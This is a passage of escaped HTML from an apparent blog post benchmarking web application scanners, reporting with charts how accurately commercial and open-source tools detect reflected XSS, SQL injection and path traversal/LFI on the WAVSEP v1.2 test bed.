Note that the &lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case detection accuracy, while the &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt; &lt;/b&gt;bar represents false positive &lt;u&gt;categories&lt;/u&gt;
detected by the tool (which may result in more instances then what the bar
actually presents, when compared to the detection accuracy bar).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Reflected XSS Detection Accuracy of Web
Application Scanners – Commercial Tools&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiawrejxLLzEKvUMR-thlxTx0-93d55HDfyrjbXIdTQL7kNGHZlcz7syCJbuxjXGVsW5piAk4LzX5r9MitN-w-gzKvIHv-_S87tGTV-ExlzdCuH0M0FZ0251spzRcLPm947T2-qJxOTzJA/s1600/rxss-score-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;166&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiawrejxLLzEKvUMR-thlxTx0-93d55HDfyrjbXIdTQL7kNGHZlcz7syCJbuxjXGVsW5piAk4LzX5r9MitN-w-gzKvIHv-_S87tGTV-ExlzdCuH0M0FZ0251spzRcLPm947T2-qJxOTzJA/s640/rxss-score-commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Reflected XSS Detection Accuracy of Web Application
Scanners – Open Source &amp;amp; Free Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMv6GUXZhBtvMSamECjZfgEstqX1JucDxEAFwuAoPV0bqwlhhqE2wIQ9QXViyGxvhecoPv7-1lLXKnPNlpl1ixecdbw5-qXoq7WuucnBgXwU12_r_7aweAhr41HAfPtpkR3yD1qZN5d60/s1600/rxss-score-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;560&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMv6GUXZhBtvMSamECjZfgEstqX1JucDxEAFwuAoPV0bqwlhhqE2wIQ9QXViyGxvhecoPv7-1lLXKnPNlpl1ixecdbw5-qXoq7WuucnBgXwU12_r_7aweAhr41HAfPtpkR3yD1qZN5d60/s640/rxss-score-opensource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Reflected XSS Detection Accuracy of Web
Application Scanners – Unified List&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq_6k9ZCXXXVvPxDaT1G4gNrvPuYgLZzrFXi9_g8YXhE6YbcGlyZ3Rd1vg4P59BGpq3tg7mBxqnah632ijjL3ZEFe-W9DJz8THcwZhz4Qfdvn4Zox00oI1Bi2AtBQMIqEyn8avD9Q1WXA/s1600/rxss-score-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;536&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq_6k9ZCXXXVvPxDaT1G4gNrvPuYgLZzrFXi9_g8YXhE6YbcGlyZ3Rd1vg4P59BGpq3tg7mBxqnah632ijjL3ZEFe-W9DJz8THcwZhz4Qfdvn4Zox00oI1Bi2AtBQMIqEyn8avD9Q1WXA/s640/rxss-score-unified.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;9. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test IV – The Detection Accuracy of
SQL Injection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The fourth assessment criterion was the detection accuracy
of SQL Injection, one of the most famous exposures and the most commonly
implemented attack vector in web application scanners.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The evaluation was performed on an application that uses
MySQL 5.5.x as its data repository, and thus, will reflect the detection
accuracy of the tool when scanning an application that uses similar data
repositories.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The comparison of the scanners&#39; SQL injection detection accuracy is documented in detail in the following section of sectoolmarket:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/sql-injection-detection-accuracy-unified-list.html&quot;&gt;http://sectoolmarket.com/sql-injection-detection-accuracy-unified-list.html&lt;/a&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;Result Chart Glossary&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Note that the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case detection accuracy, while the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt;&amp;nbsp;&lt;/b&gt;bar represents false positive&amp;nbsp;&lt;u&gt;categories&lt;/u&gt;&amp;nbsp;detected by the tool (which may result in more instances then what the bar actually presents, when compared to the detection accuracy bar).&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The SQL Injection Detection Accuracy of Web
Application Scanners – Commercial Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7vfdZrJC-kFKjQVrc4me-VbW2D6_onCQLwTlz7WlMdu2PBJJ5dwl-LcDdSbmn5HN2jaeOr-a3WFccA3WTjQ_7GvTCVjyCyfSeK3HGBXqKPSKklmYcnVyIKxShoFlQ8En2nstuWKmoj3g/s1600/sqli-score-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;194&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7vfdZrJC-kFKjQVrc4me-VbW2D6_onCQLwTlz7WlMdu2PBJJ5dwl-LcDdSbmn5HN2jaeOr-a3WFccA3WTjQ_7GvTCVjyCyfSeK3HGBXqKPSKklmYcnVyIKxShoFlQ8En2nstuWKmoj3g/s640/sqli-score-commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The SQL Injection Detection Accuracy of Web
Application Scanners – Open Source &amp;amp; Free Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_s2bjNaoBHj2s4VYO97fOJ5jZ1hQU6KmYVfg5Dmh_4dPw8aXHUkP93sfdDymH5jJ1tJkXlDrKhuhCfnAMVs99Sj4ob7b7nWIz6jC1ld6YuKk-2A0obytLxppLxgpr4QRBf_fLPmFVPQ0/s1600/sqli-score-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;630&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_s2bjNaoBHj2s4VYO97fOJ5jZ1hQU6KmYVfg5Dmh_4dPw8aXHUkP93sfdDymH5jJ1tJkXlDrKhuhCfnAMVs99Sj4ob7b7nWIz6jC1ld6YuKk-2A0obytLxppLxgpr4QRBf_fLPmFVPQ0/s640/sqli-score-opensource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The SQL Injection Detection Accuracy of Web
Application Scanners – Unified List&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYTD6RKT_wbOl36dVmNbNLa6KtRc5j5asl5VoBJbnXk56avL6FyRbCPjruPTY1bgrgKsnV9HimBdqY2Qyc5htCFX32f-2NJIXPIzEjIM1v4JVsQK1GNLN9-LRVQdliAwG6G5YsentNZ4o/s1600/sqli-score-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYTD6RKT_wbOl36dVmNbNLa6KtRc5j5asl5VoBJbnXk56avL6FyRbCPjruPTY1bgrgKsnV9HimBdqY2Qyc5htCFX32f-2NJIXPIzEjIM1v4JVsQK1GNLN9-LRVQdliAwG6G5YsentNZ4o/s640/sqli-score-unified.png&quot; width=&quot;616&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Although there are many changes in the results since the
last benchmark, both of these exposures (SQLi, RXSS) were previously assessed,
so, I believe it&#39;s time to introduce something new... something none of the
tested vendors could have prepared for in advance...&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;10. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test V – The Detection Accuracy of
Path Traversal/LFI&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The fifth assessment criterion was the detection accuracy of
Path Traversal (a.k.a Directory Traversal), a newly implemented feature in
WAVSEP v1.2, and the third most commonly implemented attack vector in web
application scanners. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The reason it was tagged along with Local File Inclusion
(LFI) is simple - many scanners don&#39;t make the differentiation between
inclusion and traversal, and furthermore, a few online vulnerability documentation
sources don&#39;t. In addition, the results obtained from the tests performed on
the vast majority of tools lead to the same conclusion - many plugins listed
under the name LFI detected the path traversal plugins.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
While implementing the path traversal test cases and
consuming nearly every relevant piece of documentation I could find on the
subject, I decided to take the current path, in spite of some acute differences
some of the documentation sources suggested (but did implemented an
infrastructure in WAVSEP for &quot;true&quot; inclusion exposures).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The point is &lt;b&gt;not&lt;/b&gt; to get into a discussion of whether
or not path traversal, directory traversal and local file inclusion should be
classified as the same vulnerability, but simply to explain why in spite of the
differences some organizations / classification methods have for these
exposures, they were listed under the same name (In sectoolmarket - path
traversal detection accuracy is listed under the title LFI).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The evaluation was performed on a &lt;b&gt;WAVSEP v1.2&lt;/b&gt;
instance that was hosted on windows XP, and although there are specific test
cases meant to emulate servers that are running with a low privileged OS user
accounts (using the servlet context file access method), many of the test cases
emulate web servers that are running with administrative user accounts.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;[Note - in addition to the wavsep installation, to
produce identical results to those of this benchmark, a file by the name of
content.ini must be placed in the root installation directory of the tomcat server-
which is different than the root directory of the web server]&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Although I didn&#39;t perform the path traversal scans on Linux
for all the tools, I did perform the initial experiments on Linux, and even a
couple of verifications on Linux for some of the scanners, and as weird as it
sounds, I can clearly state that the results were &lt;b&gt;significantly worse&lt;/b&gt;,
and although I won&#39;t get the opportunity to discuss the subject in this
benchmark, I might handle it in the next.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order to assess the detection accuracy of different path
traversal instances, I designed a total of &lt;b&gt;816&lt;/b&gt; &lt;b&gt;OS-adapting&lt;/b&gt; path
traversal test cases (meaning - the test cases adapt themselves to the OS they
are executed in, and to the server they are executed in, in the aspects of file
access delimiters and file access paths). I know it might seem a lot, and I
guess I did got carried away with the perfectionism, but you will be surprised
too see that these tests really represent common vulnerability instances, and
not necessarily super extreme scenarios, and that results of the tests did
prove the necessity.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The tests were deigned to emulate various combination of the
following conditions and restrictions:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinsP-o_u6XAgNUIYZMdfh_5ghF7D5xDrXBFefKb8o8hjFRYof6KvsDvAg2wGhfAjU8sGNcGH86N9_a_Pxd30RH9SDdl85_deXFm34LJdG6VaSYxSgenJxwVdkbsr2kJNtBdpxTGjno6MU/s1600/Path+Traversal+Tests.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;480&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinsP-o_u6XAgNUIYZMdfh_5ghF7D5xDrXBFefKb8o8hjFRYof6KvsDvAg2wGhfAjU8sGNcGH86N9_a_Pxd30RH9SDdl85_deXFm34LJdG6VaSYxSgenJxwVdkbsr2kJNtBdpxTGjno6MU/s640/Path+Traversal+Tests.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
If you will take a closer look at the detailed scan-specific
results at &lt;b&gt;www.sectoolmarket.com&lt;/b&gt;, you&#39;ll notice that some scanners were &lt;b&gt;completely
unaffected&lt;/b&gt; by the response content type and HTTP code variation, while
other scanners were &lt;b&gt;dramatically affected&lt;/b&gt; by the variety (gee, it&#39;s nice
to know that I didn&#39;t write them all for nothing... :) ).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In reality, there were supposed to more test cases,
primarily because I intended to test injection entry points in which the input
only affected the filename without the extension, or was injected directly into
the directory name. However, due to the sheer amount of tests and the deadline
I had for this benchmark, I decided to delete (literally) the test cases that
handled these anomalies, and focus on test cases in which the entire
filename/path was affected. That being said, I might publish these test cases
in future versions of wavsep (they amount to a couple of hundreds).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The comparison of the scanners&#39; path traversal detection accuracy is documented in detail in the following section of sectoolmarket:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/path-traversal-local-file-inclusion-detection-accuracy-unified-list.html&quot;&gt;http://sectoolmarket.com/path-traversal-local-file-inclusion-detection-accuracy-unified-list.html&lt;/a&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;Result Chart Glossary&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Note that the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case detection accuracy, while the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt;&amp;nbsp;&lt;/b&gt;bar represents false positive&amp;nbsp;&lt;u&gt;categories&lt;/u&gt;&amp;nbsp;detected by the tool (which may result in more instances then what the bar actually presents, when compared to the detection accuracy bar).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Path Traversal / LFI Detection Accuracy of Web
Application Scanners – Commercial Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp__vloiqMpV_tpyfHWdmlbBDEYCwk4CE2888Rfz-ffqu9EHCupWOVZNuzRyOd42fgD52UM20WytrTLTfQxB2Fb5ikR60wYPf2Dm1sl7MVzV4BC7D4Y6mYLNQOSHUuGSXDTEU8WJOnH7c/s1600/lfi-score-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;282&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp__vloiqMpV_tpyfHWdmlbBDEYCwk4CE2888Rfz-ffqu9EHCupWOVZNuzRyOd42fgD52UM20WytrTLTfQxB2Fb5ikR60wYPf2Dm1sl7MVzV4BC7D4Y6mYLNQOSHUuGSXDTEU8WJOnH7c/s640/lfi-score-commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Path Traversal / LFI Detection Accuracy of Web
Application Scanners – Open Source &amp;amp; Free Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoQG7KRbhAsEyASZromEa5UHrr9bVK_3Uzw1XPfwf7lpGWb_MPjbx6oopYA5GyRam8fl6F50uEFMIvYzM0ZxQ2eVFTGEnCZj4rQqp-MmxcFRWTbdFHkUZoFiqSeLgkejGB6e9xLBO8AC0/s1600/lfi-score-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;284&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoQG7KRbhAsEyASZromEa5UHrr9bVK_3Uzw1XPfwf7lpGWb_MPjbx6oopYA5GyRam8fl6F50uEFMIvYzM0ZxQ2eVFTGEnCZj4rQqp-MmxcFRWTbdFHkUZoFiqSeLgkejGB6e9xLBO8AC0/s640/lfi-score-opensource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Path Traversal / LFI Detection Accuracy of Web
Application Scanners – Unified List&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIuf9Ui3699-wDJBexLAr9SR2DRpDG5YEwohSvZaMfA8znVTda1-rBEHvc2oKOupn55l9TQS1HBrSk7WHoNzn0UgGUyVK67gWFfKBNkJw5BA2fniL3bojNF1ZGWn0ayWRTsgaTWNfU_yI/s1600/lfi-score-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;540&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIuf9Ui3699-wDJBexLAr9SR2DRpDG5YEwohSvZaMfA8znVTda1-rBEHvc2oKOupn55l9TQS1HBrSk7WHoNzn0UgGUyVK67gWFfKBNkJw5BA2fniL3bojNF1ZGWn0ayWRTsgaTWNfU_yI/s640/lfi-score-unified.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
And what of LFI&#39;s evil counterpart, Remote File Inclusion? &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
(yeah yeah, I know, it was path traversal...)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
